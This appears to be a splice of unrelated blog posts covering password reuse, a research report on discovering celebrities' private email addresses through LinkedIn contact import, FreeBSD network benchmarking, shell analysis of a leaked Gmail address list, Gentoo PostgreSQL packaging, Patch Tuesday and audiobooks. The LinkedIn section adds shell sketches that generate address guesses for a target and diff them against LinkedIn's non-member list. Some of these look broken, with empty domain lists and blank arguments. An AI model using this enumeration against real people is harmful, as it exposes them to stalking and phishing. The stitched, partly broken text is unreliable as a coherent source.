Roll-your-own and host-your-own are, first of all, not options for people who have no intention of learning how computer systems work — and I can't blame them; I don't want to know how my fridge or dishwasher works, I just want them to work. People don't care to learn that you can get file A onto computer B, but that if you then change it on both while offline you'll have a collision, and lose one of the two changes. They either have no time, no interest, or (though I don't think that happens often) no skill to understand that. And it's not just the random young adult who ends up registering on xtube with no idea what that means. Jeremy Clarkson had to learn the hard way what it means to publish your bank details to the world.

But I think it's more important to consider the number of people who believe they have the skills and the time, and are then found lacking one or both. Who do you think can protect your content (and passwords) better: a big company with entire teams dedicated to security, or an average 16-year-old who thinks he can run the website's forum? The reference here is to myself: back in 2000/2001 I was the forum admin for an Italian gaming community. We got hacked, multiple times, and every time was a new discovery for me of what security means. At the time, third-party forum hosting was reserved for paying customers, and the results were probably terrible. My personal admin password matched one of my email addresses' up until last week, and I know for a fact that at least one group of people got access to the password database, where the passwords were stored in plain text.

Yes, it is true that targets such as Adobe will yield many more valid email addresses and password hashes than your average forum, but as the "fake" 5M accounts should have shown you, targeting enough small fish can lead to much the same results, if not better, as you may be lucky and stumble across two passwords for the same account, which lets you overcome the above-mentioned similar-but-different passwords strategy. Indeed, as I noted in my previous post, Comic Book Database admitted to being the source of part of that dump, and it lists at least four thousand public users (contributors). Other sites such as MythTV Talk or, both also involved, have no such statement either.

This is not just a matter of the security of the code itself, so the "many eyes" answer does not apply. It is entirely possible to have a screw-up with an open source program as well, if it's misconfigured, or if a vulnerable version doesn't get updated in time because the admin just has no time. You see that all the time with WordPress and its security issues. Indeed, the reason I don't migrate my blog to WordPress is that I would never have enough time for it.

I have seen people, geeks and non-geeks both, taking the easy way out too many times, blaming Apple for the nude celebrity pictures or Google for the five million accounts. It's a safe story: "the big guys don't know better", "you just should keep it off the Internet", "you should run your own!" At the end of the day, both turned out to be collections, assembled from many small cuts, either targeted or not, in part due to people's bad password hygiene (or operational security if you prefer a more geek term), and in part due to the fact that nothing is perfect.

One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing.

LinkedIn has built much of its considerable worth on the age-old maxim that “it’s all about who you know.” As a LinkedIn user, you can directly connect with those you attest to knowing professionally or personally, but you can also ask to be introduced to someone you’d like to meet by sending a request through someone who bridges your separate social networks. Celebrities, executives or any other LinkedIn users who wish to avoid unsolicited contact requests may do so by selecting an option that forces the requesting party to supply the personal email address of the intended recipient.

LinkedIn’s entire social fabric begins to unravel if any user can directly connect to any other user, regardless of whether or how their social or professional circles overlap. Unfortunately for LinkedIn (and its users who wish to have their email addresses kept private), this is the exact risk introduced by the company’s built-in efforts to expand the social network’s user base.

According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users.

LinkedIn assumes that if an email address is in your contacts list, you must already know this person. But what if your entire reason for signing up with LinkedIn is to discover the private email addresses of famous people? All you’d need to do is populate your email account’s contacts list with hundreds of permutations of famous people’s names — including combinations of last names, first names and initials — in front of,,, etc. With any luck and some imagination, you may well be on your way to an A-list LinkedIn friends list (or a fantastic set of addresses for spear-phishing, stalking, etc.).
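The permutation step described above is mechanical enough to sketch in a few lines of shell. The name and domains below are made up purely for illustration; the real attack just scales the same idea up to hundreds of guesses per target:

```shell
#!/bin/sh
# Sketch of the permutation step: emit plausible address guesses for
# one hypothetical target, one per line, ready to be imported as a
# contacts list. Name and domains here are invented, not real targets.
first=jane
last=doe
initial=$(printf '%s' "$first" | cut -c1)
for domain in; do
    printf '%s\n' \
        "$first.$last@$domain" \
        "$first$last@$domain" \
        "$initial$last@$domain" \
        "$first.$initial@$domain" \
        "$last.$first@$domain"
done
```

With three domains and five patterns this already yields fifteen guesses; the Excel macro Seely mentions below is just this loop at a larger scale.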

LinkedIn lets you know which of your contacts aren’t members.
When you import your list of contacts from a third-party service or from a stand-alone file, LinkedIn will show you any profiles that match addresses in your contacts list. More significantly, LinkedIn helpfully tells you which email addresses in your contacts lists are not LinkedIn users.

It’s that last step that’s key to finding the email address of the targeted user to whom LinkedIn has just sent a connection request on your behalf. The service doesn’t explicitly tell you that person’s email address, but by comparing your email account’s contact list to the list of addresses that LinkedIn says don’t belong to any users, you can quickly figure out which address(es) on the contacts list correspond to the user(s) you’re trying to find.
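That comparison is simple set subtraction, which can be sketched with standard tools. The file names and addresses here are invented for the example; the point is only that whatever LinkedIn did *not* flag as a non-member must be a member:

```shell
# guesses.txt: every address seeded into the contacts list.
# nonmembers.txt: the addresses LinkedIn reported as non-members.
# comm(1) needs sorted input; lines unique to guesses.txt (-23)
# are addresses LinkedIn recognised, i.e. likely member addresses.
printf '%s\n' '' '' '' \
    | sort > guesses.txt
printf '%s\n' '' '' \
    | sort > nonmembers.txt
comm -23 guesses.txt nonmembers.txt   # ->
```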

Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information. Last month, the two researchers detailed how they were able to de-anonymize posts to Secret, an app-driven online service that allows people to share messages anonymously within their circle of friends, friends of friends, and publicly. In February, Seely more famously demonstrated how to use Google Maps to intercept FBI and Secret Service phone calls.

This time around, the researchers picked on Dallas Mavericks owner Mark Cuban to prove their point with LinkedIn. Using their low-tech hack, the duo was able to locate the Webmail address Cuban had used to sign up for LinkedIn. Seely said they found success in locating the email addresses of other celebrities using the same method about nine times out of ten.

“We created several hundred possible addresses for Cuban in a few seconds, using a Microsoft Excel macro,” Seely said. “It’s just a brute-force guessing game, but 90 percent of people are going to use an email address that includes components of their real name.”

The Rhino guys really wanted Cuban’s help in spreading the word about what they’d found, but instead of messaging Cuban directly, Seely pursued a more subtle approach: He knew Cuban’s latest start-up was Cyber Dust, a chat messenger app designed to keep your messages private. So, Seely fired off a tweet complaining that “Facebook Messenger crosses all privacy lines,” and that as a result he was switching to Cyber Dust.

When Mark Cuban retweeted Seely’s endorsement of Cyber Dust, Seely reached out to Cyber Dust CEO Ryan Ozonian, letting him know that he’d discovered Cuban’s email address on LinkedIn. In short order, Cuban was asking Rhino to test the security of Cyber Dust.

“Fortunately no major faults were found, and those he found are already fixed in the coming update,” Cuban said in an email exchange with KrebsOnSecurity. “I like working with them. They look to help rather than exploit. We have learned from them and I think their experience will be valuable to other app publishers and networks as well.”

Cory Scott, director of information security at LinkedIn, said very few of the company’s members opt in to the requirement that all new potential contacts supply the invitee’s email address before sending an invitation to connect. He added that email address-to-user mapping is a fairly common design pattern, that it is not particularly unique to LinkedIn, and that nothing the company does will prevent people from blasting emails to lists of addresses that might belong to a targeted user, hoping that one of them will hit home.

“Email address permutators, of which there are many of them on the ‘Net, have existed much longer than LinkedIn, and you can blast an email to all of them, knowing that most likely one of those will hit your target,” Scott said. “This is kind of one of those challenges that all social media companies face in trying to prevent the abuse of [site] functionality. We have rate limiting, scoring and abuse detection mechanisms to prevent frequent abusers of this service, and to make sure that people can’t validate spam lists.”

In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses.

“We are in the process of implementing two short-term changes and one longer term change to give our members more control over this feature,” LinkedIn spokeswoman Nicole Leverich wrote in an emailed statement. “In the next few weeks, we are introducing new logic models designed to prevent hackers from abusing this feature. In addition, we are making it possible for members to ask us to opt out of being discoverable through this feature. In the longer term, we are looking into creating an opt-out box that members can choose to select to not be discoverable using this feature.”

The first BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

When I posted my previous post on accounts on Google+, I received a very interesting suggestion that I would like to bring to the attention of more people. Andrew Cooks pointed out that what LastPass (and other password managers) really need is a way to specify the password policy programmatically, rather than crowdsourcing this data as LastPass is doing right now.

There are already a number of cross-product specifications for fixed-path files that describe site parameters, such as robots.txt or sitemap.xml. While cleaning up my blog's image serving I also found that there is a rules.abe file used by the NoScript extension for Firefox. Along the same lines, a new password-policy.txt file could define the parameters of a website's password policy.

Things like the minimum and maximum length of the password, which characters are allowed, and whether it is case sensitive. This is important information that all password managers need to know, and as I said, not all websites make it clear to the user either. I'll recount two different horror stories, one from the past and one more recent, that show why this is important.

The first story is from almost ten years ago. I registered with the Italian postal service. I selected a "strong" (not really) password, 11 characters long. It was not really dictionary-based, but it was close enough if you knew my password pattern. Anyway, I liked the idea of having a long password. I signed up, I logged back in, everything worked. Until a few months later, when I decided I wanted to fetch that particular mailbox from GMail — yes, the Italian postal service gives you an email box; no, I don't want to comment further on that.

What happened is that the moment I tried to set up mail fetching on GMail, it kept failing authentication. And I was sure I was using the right password, the one I had used all along! I could log in on the website just fine with it, so what gives? A quick check of the password that my browser (I think Firefox at the time) had saved for that website showed me the truth: the password I had been using to log in did not match the one I tried to use from GMail; the last character was missing. Some further inspection of the postal service website showed that the password fields, both on the password change and login pages (and, I assumed at the time, the registration page, for obvious reasons), set a maxlength of 10. So as long as I typed or pasted the password into the field, the way I typed it when I registered, it worked perfectly fine; but when I tried to log in out of band (through POP3) it used the password as I intended it, and failed.

A similar, more recent story happened with LastMinute. I went to change my password, in my recent spree of updating all my passwords, even for accounts not in use (mostly to make sure that they don't get leaked and let people do crazy stuff to me). My default password generator on LastPass is set to generate 32-character passwords. But that did not work for LastMinute, or rather, it appeared to. It let me change my password just fine, but when I tried logging back in, it did not work. Yes, this is why I try to log back in right after generating a password: I've seen this happen before. In this case, the problem was the length of the password.

But just having a proper range for the password length wouldn't be enough. Other useful details include the allowed symbols: I have found that sometimes I need to generate a number of passwords to find one that avoids the disallowed symbols while still containing some, or give up on symbols altogether and ask LastPass to generate only letters and numbers. Another is whether the password is case sensitive, because if it is not, what I do is disable one set of letters, so that the generator randomises the rest better.
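Pulling those fields together, such a file might look something like this. Every field name here is invented for illustration; no such specification exists yet:

```
# password-policy.txt — hypothetical, served at a fixed path like robots.txt
min-length: 8
max-length: 32
case-sensitive: yes
allowed-symbols: !#$%&*+-_
require-symbol: no
```

A password manager fetching something like this before generating a password would never need the trial-and-error described above.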

But there is more metadata that could be of use here — things like which domains the password should be shared with. Right now LastPass has a (limited) predefined list of equivalent domains, and of hostnames that need to match exactly (so that and are given different passwords), while it's up to you to build the rest of the database. Even for the Amazon domains the list is not comprehensive, and I had to add quite a few when logging in to the Italian and UK stores.

Of course, if you could just declare that your website uses the same password as, say,, you're going to have a problem. What you need is a reciprocal indication that both sites consider the other equivalent, basically by serving the same identical file. This makes the implementation a bit more complex, but it should not be too difficult, as those kinds of sites tend to at least share robots.txt (okay, not in the case of Amazon), so distributing one more file should not be that hard.
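The reciprocity check itself would be cheap. A minimal sketch, assuming a hypothetical password-policy.txt file served at a fixed path on both domains, and using curl for fetching:

```shell
# Sketch of the reciprocal check: two domains are treated as equivalent
# only if both serve an identical policy file. The file path is part of
# the hypothetical scheme discussed here, not an existing standard.
same_policy() {
    a=$(curl -sf "https://$1/password-policy.txt") || return 1
    b=$(curl -sf "https://$2/password-policy.txt") || return 1
    [ -n "$a" ] && [ "$a" = "$b" ]
}
# usage: same_policy && echo equivalent
```

A password manager would run this once per suspected pair and cache the result, the same way it caches site icons.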

I'm not sure if anybody is going to work on implementing this, or writing a proper specification for it, rather than a vague rant on a blog, but hope can't die, right?

I think it's about time I shared some more details about the RSS stuff going into FreeBSD and how I'm testing it.

For now I'm focusing on IPv4 + UDP on the Intel 10GE NICs. The TCP side of things is done (and the IPv6 side of things works too!) but enough of the performance walls show up in the IPv4 UDP case that it's worth sticking to it for now.

I'm testing on a pair of 4-core boxes at home. They're not special - and they're very specifically not trying to be server-class hardware. I'd like to see where these bottlenecks are even at low core count.

The test setup in question:

Testing software:

  • It requires libevent2 - an updated copy; previous versions of libevent2 didn't handle FreeBSD-specific errors gracefully and would error out of the IO loop early.


  • CPU: Intel(R) Core(TM) i5-3550 CPU @ 3.30GHz (3292.59-MHz K8-class CPU)
  • There's no SMT/HTT, but I've disabled it in the BIOS just to be sure
  • 4GB RAM
  • FreeBSD-HEAD, amd64
  • NIC: 82599EB 10-Gigabit SFI/SFP+ Network Connection
  • ix0:

# for now redirect processing just makes the lock overhead suck even more.
# disable it.


# experiment with deferred dispatch for RSS
kernel config:

include GENERIC

device netmap
options RSS
options PCBGROUP

# in-system lock profiling

# Flowtable - the rtentry locking is a bit .. slow.
options   FLOWTABLE

# This debugging code has too much overhead to do accurate
# testing with.
nooptions         INVARIANTS
nooptions         INVARIANT_SUPPORT
nooptions         WITNESS
nooptions         WITNESS_SKIPSPIN

The server runs the "rss-udp-srv" process, which behaves like a multi-threaded UDP echo server on port 8080.


The client box is slightly more powerful to compensate for (currently) not using completely affinity-aware RSS UDP transmit code.

  • CPU: Intel(R) Core(TM) i5-4460  CPU @ 3.20GHz (3192.68-MHz K8-class CPU)
  • SMT/HTT: Disabled in BIOS
  • 8GB RAM
  • FreeBSD-HEAD amd64
  • Same kernel config, loader and sysctl config as the server
  • ix0: configured as,,,,
The client runs 'udp-clt' programs to source and sink traffic to the server.

Running things

The server-side simply runs the listen server, configured to respond to each frame:

$ rss-udp-srv 1

The client side runs four copies of udp-clt, each from a different IP address. These are run in parallel (I do it in different screens, so I can quickly see what's going on):

$ ./udp-clt -l -r -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l -r -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l -r -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l -r -p 8080 -n 10000000000 -s 510

The IP addresses are chosen so that the 2-tuple Toeplitz hash, using the default Microsoft key, hashes to different RSS buckets that live on individual CPUs.

Results: Round one

When the server is responding to each frame, the following occurs. The numbers are: "number of frames generated by the client (netstat)", "number of frames received by the server (netstat)", "number of frames seen by rss-udp-srv", "number of responses transmitted from rss-udp-srv", "number of frames received back by the client (netstat)"
  • 1 udp-clt process: 710,000; 710,000; 296,000; 283,000; 281,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 592,000; 592,000; 575,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 636,000; 636,000; 600,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 255,000; 255,000; 255,000
So, it's not actually linear past two cores. The question here is: why?

There are a couple of parts to this.

Firstly - I had left turbo boost on. What this translated to:

  • One core active: ~ 30% increase in clock speed
  • Two cores active: ~ 30% increase in clock speed
  • Three cores active: ~ 25% increase in clock speed
  • Four cores active: ~ 15% increase in clock speed.
Secondly and more importantly - I had left flow control enabled. This made a world of difference.

The revised results are mostly linear - with more active RSS buckets (and thus CPUs) things seem to get slightly more efficient:
  • 1 udp-clt process: 710,000; 710,000; 266,000; 266,000; 266,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 512,000; 512,000; 512,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 810,000; 810,000; 810,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 1,120,000; 1,120,000; 1,120,000

Finally, let's repeat the process, but only receiving packets instead of also echoing them back to the client:

$ rss-udp-srv 0
  • 1 udp-clt process: 710,000; 710,000; 204,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 378,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 645,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 900,000
The receive-only workload is actually worse than the transmit + receive workload!

What's going on here?

Well, a little digging shows that in both instances - even with a single udp-clt thread running which means only one CPU on the server side is actually active! - there's active lock contention.

Here's an example dtrace output for measuring lock contention with only one active process, where one CPU is involved (and the other three are idle):

Receive only, 5 seconds:

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # dtrace -n 'lockstat:::adaptive-block { @[stack()] = sum(arg1); }'
dtrace: description 'lockstat:::adaptive-block ' matched 1 probe


Transmit + receive, 5 seconds:

dtrace: description 'lockstat:::adaptive-block ' matched 1 probe




Somehow it seems there's less lock contention / blocking going on when both transmit and receive is running!

So then I dug into it using the lock profiling suite. This is for 5 seconds with receive-only traffic on a single RSS bucket / CPU (all other CPUs are idle):

# sysctl = 1; sleep 5 ; sysctl

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl ; sleep 5 ; sysctl 1 -> 1 1 -> 0

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl | head -2 ; sysctl | sort -nk4 | tail -10 
     max  wait_max       total  wait_total       count    avg wait_avg cnt_hold cnt_lock name
    1496         0       10900           0          28    389      0  0      0 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2755 (sx:USB config SX lock) 
       0         0          31           1          67      0      0  0      4 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:888 (spin mutex:sched lock 2)
       0         0        2715           1       49740      0      0  0      7 /usr/home/adrian/work/freebsd/head/src/sys/dev/random/random_harvestq.c:294 (spin mutex:entropy harvest mutex)
       1         0          51           1         131      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:1179 (spin mutex:sched lock 1)
       0         0          69           2         170      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:886 (spin mutex:sched lock 2)
       0         0       40389           2      287649      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/kern_intr.c:1359 (spin mutex:sched lock 2)
       0         2           2           4          12      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2762 (sleep mutex:Giant)
      15        20        6556         520        2254      2      0  0    105 /usr/home/adrian/work/freebsd/head/src/sys/dev/acpica/Osd/OsdSynch.c:535 (spin mutex:ACPI lock (0xfffff80002b10f00))

       4         5      195967       65888     3445501      0      0  0  28975 /usr/home/adrian/work/freebsd/head/src/sys/netinet/udp_usrreq.c:369 (sleep mutex:so_rcv)

Notice the lock contention for the so_rcv (socket receive buffer) handling? What's going on here is pretty amusing - it turns out that because there's so much receive traffic going on, the userland process receiving the data is being preempted by the NIC receive thread very often - and when this happens, there's a good chance it's going to be within the small window that the receive socket buffer lock is held. Once this happens, the NIC receive thread processes frames until it gets to one that requires it to grab the same sock buffer lock that is already held by userland - and it fails - so the NIC thread sleeps until the userland thread finishes consuming a packet. Then the CPU flips back to the NIC thread and continues processing a packet.

When the userland code is also transmitting frames it's increasing the amount of time in between socket receives and decreasing the probability of hitting the lock contention condition above.

Note there's no contention between CPUs here - this is entirely contention within a single CPU.

So for now I'm happy that the UDP IPv4 path is scaling well enough with RSS on a single core. The main performance problem here is the socket receive buffer locking (and, yes, copyin() / copyout().)


There has been some noise around a leak of username/password pairs which somehow panicked people into thinking it was coming from a particular provider. Since it seems most people have not even tried looking at the account information available, I'd like to point out some ways that could have helped avoid the panic, if only the reporters had cared. It also fits nicely into my previous notes on accounts' churn.

But before proceeding let me make one thing straight: this post contains no information that is not available to the public and bears no relation to my daily work for my employer. Just wanted to make that clear. Edit: for the official response, please see this blog post of Google's Security blog.

To begin the analysis you need a copy of the list of usernames; Italian blogger Paolo Attivissimo linked to it in his post but I'm not going to do so. Especially since it's likely to become obsolete soon, and might not be liked by many. The archive is a compressed list of usernames without passwords or password hashes. At first, it seems to contain almost exclusively addresses — in truth there are more addresses but it probably does not hit the news as much to say that there are some 5 million addresses from some thousand domains.

Let's first try to extract real email addresses from the file, which I'll call rawsource.txt — yes it does not match the name of the actual source file out there but I would rather avoid the search requests finding this post from the filename.

$ fgrep @ rawsource.txt > source-addresses.txt
This removes some two thousand lines that were not valid addresses — it turns out that the file actually contains some passwords, so let's process it a little more to get a bigger sample of valid addresses:

$ sed -i -e 's:|.*::' source-addresses.txt
This should make the next command give us a better estimate of the content:

$ sed -n -e 's:.*@::p' source-addresses.txt | sort | uniq -c | sort -n
608 gmail.com777
So, as we were saying earlier, there are more than just Google accounts in this. A good chunk of them are on Yandex, but if you look at the outliers in the list there are plenty of other domains, including Yahoo. Let's filter away the four thousand addresses using either broken or outlier domains and instead focus on these three providers:

$ egrep '@(||$' source-addresses.txt > good-addresses.txt
Now things get more interesting, because to proceed to the next step you have to know how email servers and services work. For these three providers, and many default setups for postfix and the like, the local part of the address (everything before the @ sign) can contain a + sign; when that is found, the local part is split into user and extension, so that mail to nospam+noreally would be sent to the user nospam. Servers generally ignore the extension altogether, but you can use it either to register multiple accounts on the same mailbox (like I do for PayPal, IKEA, Sony, …) or to filter the received mail into different folders. I know some people who think they can absolutely identify the source of spam this way — I'm a bit more skeptical: if I were a spammer, I would drop the extension altogether. Only some very die-hard Unix fans would not allow inbound email without an extension. Especially since I know plenty of services that don't accept email addresses with + in them.

Since this feature is not very well known, there are going to be very few email addresses using it, but that's still good, because it limits the amount of data to crawl through. Finding a pattern within 5M addresses is going to take a while; finding one in 4k is much easier:

$ egrep '.*\+.*@.*' good-addresses.txt | sed -e '/.*@.*@.*/d' > experts-addresses.txt
The second command filters out some false positives due to two addresses being on the same line; the result from the source file I started with is 3964 addresses. Now we're talking. Let's extract the extensions from those good addresses:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort > extensions.txt
The first obvious thing you can do is figure out if there are duplicates. While the single extensions are probably interesting too, finding a pattern is easier if you have people using the same extension, especially since there aren't that many. So let's see which extensions are common:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort | uniq -c -d | sort -n > common-extensions.txt
A quick look at that shows that a good chunk of the extensions used (the last line in the generated file) were referencing xtube – which you may or may not know as a porn website – reminding me of the YouPorn-related leak two and a half years ago. Scouring through the list of extensions, it's also easy to spot the words "porn" and "porno", and even "nudeceleb", which suggests the list is probably quite up to date.

Just looking at the list of extensions shows a few patterns. Things like friendster, comicbookdb (and variants like comics, comicdb, …) and then daz (dazstudio), and mythtv. As RT points out it might very well be phishing attempts, but it is also well possible that some of those smaller sites such as comicbookdb were breached and people just used the same passwords for their GMail address as the services (I used to, too!), which is why I think mandatory registrations are evil.

The final automatic interesting discovery you can make involves checking for full domains in the extensions themselves:

$ fgrep . extensions.txt | sort -u
This will give you which extensions include a dot in the name, many of which are actually proper site domains: xtube figures again, and so does comicbookdb, friendster, mythtvtalk, dax3d, s2games, policeauctions, itickets and many others.

What does this all tell me? I think this list was compiled from breaches of various small websites that wouldn't make a headline (and that most likely did not report the breach to their users!), plus some general phishing. Most of the passwords that have been confirmed as valid likely come from people reusing the same password across websites. This breach is fixed like every one before it: stop using the same password across different websites, start using something like LastPass, and use 2 Factor Authentication everywhere it is possible.

Unifying PostgreSQL Ebuilds titanofold | 2014-09-10 14:01 UTC

After an excruciating wait and years of learning PostgreSQL, it’s time to unify the PostgreSQL ebuilds. I’m not sure what the original motivation was to split the ebuilds, but, from the history I’ve seen on Gentoo, it has always been that way. That’s a piss-poor reason for continuing to do things a certain way, especially when that way is wrong and makes things more tedious and difficult than they ought to be.

I’m to blame for pressing forward with splitting the ebuilds into -docs, -base, and -server when I first got started in Gentoo. I knew from the outset that having them split was not a good idea; I just didn’t know as much as I do now to defend one way or the other. To be fair, Patrick (bonsaikitten) would have gone with whatever I decided to do, but I thought I understood the advantages. Now I look at it and see only disadvantages.

Let’s first look at the build times for building the split ebuilds:

1961.35user 319.42system 33:59.44elapsed 111%CPU (0avgtext+0avgdata 682896maxresident)k
46696inputs+2000640outputs (34major+34350937minor)pagefaults 0swaps
1955.12user 325.01system 33:39.86elapsed 112%CPU (0avgtext+0avgdata 682896maxresident)k
7176inputs+1984960outputs (33major+34349678minor)pagefaults 0swaps
1942.90user 318.89system 33:53.70elapsed 111%CPU (0avgtext+0avgdata 682928maxresident)k
28496inputs+1999688outputs (124major+34343901minor)pagefaults 0swaps
And now the unified ebuild:

1823.57user 278.96system 30:29.20elapsed 114%CPU (0avgtext+0avgdata 683024maxresident)k
32520inputs+1455688outputs (100major+30199771minor)pagefaults 0swaps
1795.63user 282.55system 30:35.92elapsed 113%CPU (0avgtext+0avgdata 683024maxresident)k
9848inputs+1456056outputs (30major+30225195minor)pagefaults 0swaps
1802.47user 275.66system 30:08.30elapsed 114%CPU (0avgtext+0avgdata 683056maxresident)k
13800inputs+1454880outputs (49major+30193986minor)pagefaults 0swaps
So, the unified ebuild is about 10% faster than the split ebuilds.
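The 10% figure checks out against the elapsed times above, rounded to whole seconds:

```shell
# Mean elapsed times, in seconds, from the three runs of each variant:
# split:   33:59, 33:40, 33:54 -> 2039, 2020, 2034
# unified: 30:29, 30:36, 30:08 -> 1829, 1836, 1808
split=$(( (2039 + 2020 + 2034) / 3 ))
unified=$(( (1829 + 1836 + 1808) / 3 ))
echo "split mean: ${split}s, unified mean: ${unified}s"
echo "speedup: $(( (split - unified) * 100 / split ))%"   # -> 10%
```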

There are also a few bugs open that will be resolved by moving to a unified ebuild. Whenever someone changes anything in their flags, Portage tends to only pick up dev-db/postgresql-server as needing to be recompiled rather than the appropriate dev-db/postgresql-base, which results in broken setups and failures to even build. I’ve even been accused of pulling the rug out from under people. I swear, it’s not me…it’s Portage…who I lied to. Kind of.

There should be little interruption, though, to the end user. I’ll be keeping all the features that splitting brought us. Okay, feature. There’s really just one feature: Proper slotting. Portage will be informed of the package moves, and everything should be hunky-dory with one caveat: A new ‘server’ USE flag is being introduced to control whether to build everything or just the clients and libraries.

No, I don’t want to do a lib-only flag. I don’t want to work on another hack.

You can check out the progress on my overlay. I’ll be working on updating the dependent packages as well so they’re all ready to go in one shot.

Adobe today released updates to fix at least a dozen critical security problems in its Flash Player and AIR software. Separately, Microsoft pushed four update bundles to address at least 42 vulnerabilities in Windows, Internet Explorer, Lync and .NET Framework. If you use any of these, it’s time to update!

Most of the flaws Microsoft fixed today (37 of them) are addressed in an Internet Explorer update — the only patch this month to earn Microsoft’s most-dire “critical” label. A critical update wins that rating if the vulnerabilities fixed in the update could be exploited with little to no action on the part of users, save for perhaps visiting a hacked or malicious Web site with IE.

I’ve experienced trouble installing Patch Tuesday packages along with .NET updates, so I make every effort to update .NET separately. To avoid complications, I would recommend that Windows users install all other available recommended patches except for the .NET bundle; after installing those updates, restart Windows and then install any pending .NET fixes. Your mileage may vary.

For more information on the rest of the updates released today, see this post at the Microsoft Security Response Center Blog.

Adobe’s critical update for Flash Player fixes at least 12 security holes in the program. Adobe is urging Windows and Macintosh users to update to the latest version of Flash Player by visiting the Adobe Flash Player Download Center, or via the update mechanism within the product when prompted. If you’d rather not be bothered with downloaders and software “extras” like antivirus scanners, you’re probably best off getting the appropriate update for your operating system from this link.

To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash.

Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera). If you have Adobe AIR installed (required by some programs like Pandora Desktop), you’ll want to update that program as well. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15 for Windows, Mac, and Android.

Adobe had also been scheduled to release updates today for Adobe Reader and Acrobat, but the company said it was pushing that release date back to the week of Sept. 15 to address some issues that popped up during testing of the patches.

As always, if you experience any issues updating these products, please leave a note about your troubles in the comments below.

In one of my previous posts I have noted I'm an avid audiobook consumer. I started when I was at the hospital, because I didn't have the energy to read — and most likely, because of the blood sugar being out of control after coming back from the ICU: it turns out that blood sugar changes can make your eyesight go crazy; at some point I had to buy a pair of €20 glasses simply because my doctor prescribed me a new treatment and my eyesight ricocheted out of control for a week or so.

Nowadays, I have trouble sleeping if I'm not listening to something, and I end up with the Audible app installed in all my phones and tablets, with at least a few books preloaded whenever I travel. Of course as I said, I keep the majority of my audiobooks in the iPod, and the reason is that while most of my library is on Audible, not all of it is. There are a few books that I bought on iTunes before finding out about Audible, and then there are a few I received in CD form, including The Hitchhiker's Guide To The Galaxy Complete Radio Series, which is among my favourite playlists.

Unfortunately, to be able to convert these from CD to a format that the iPod could digest, I ended up having to buy a piece of software called Audiobook Builder for Mac, which allows you to rip CDs and build M4B files out of them. What's M4B? It's the usual mp4 format container, just with an extension that makes iTunes consider it an audiobook, and with chapter markings in the stream. At the time I first ripped my audiobooks, ffmpeg/libav had no support for chapter markings, so that was not an option. I've been told that said support is there now, but I have not tried getting it to work.

Indeed, what I need to find out is how to build an audiobook file out of a string of mp3 files, and I have no idea how to do that now that I no longer have access to my personal iTunes account on a Mac to re-download Audiobook Builder and process them. In particular, the mp3s that I'm looking forward to merging together are the 2013 and 2014 runs of BBC's The News Quiz, to which I'm addicted and listen continuously. Being able to join them all together so I can listen to them in a multi-day-running playlist is one of the very few things that still lets me sleep relatively calmly — I say relatively because I really can't remember the last time I slept soundly; it's been about a year by now.
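For what it's worth, stitching a string of mp3s into a chaptered M4B these days generally goes through ffmpeg's FFMETADATA format: you concatenate the audio and attach a metadata file with one [CHAPTER] block per episode. A minimal sketch of generating that chapter list (the function name and the episode titles/durations are made-up placeholders; you'd still need ffmpeg itself for the actual concatenation and remux):

```python
# Sketch: emit an FFMETADATA1 chapters file for ffmpeg, one chapter per mp3.
# Durations are assumed inputs (e.g. obtained beforehand with ffprobe).

def build_chapters(titles_and_durations):
    """titles_and_durations: list of (title, seconds) tuples, in playback order."""
    lines = [";FFMETADATA1"]
    start = 0
    for title, seconds in titles_and_durations:
        end = start + int(seconds * 1000)  # chapter times in ms at TIMEBASE=1/1000
        lines += [
            "[CHAPTER]",
            "TIMEBASE=1/1000",
            f"START={start}",
            f"END={end}",
            f"title={title}",
        ]
        start = end  # next chapter begins where this one ends
    return "\n".join(lines)

episodes = [
    ("The News Quiz 2013-01-04", 1680.0),
    ("The News Quiz 2013-01-11", 1695.5),
]
print(build_chapters(episodes))
```

The resulting file would then be fed to ffmpeg with something like `-i chapters.txt -map_metadata 1` when writing the .m4b.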

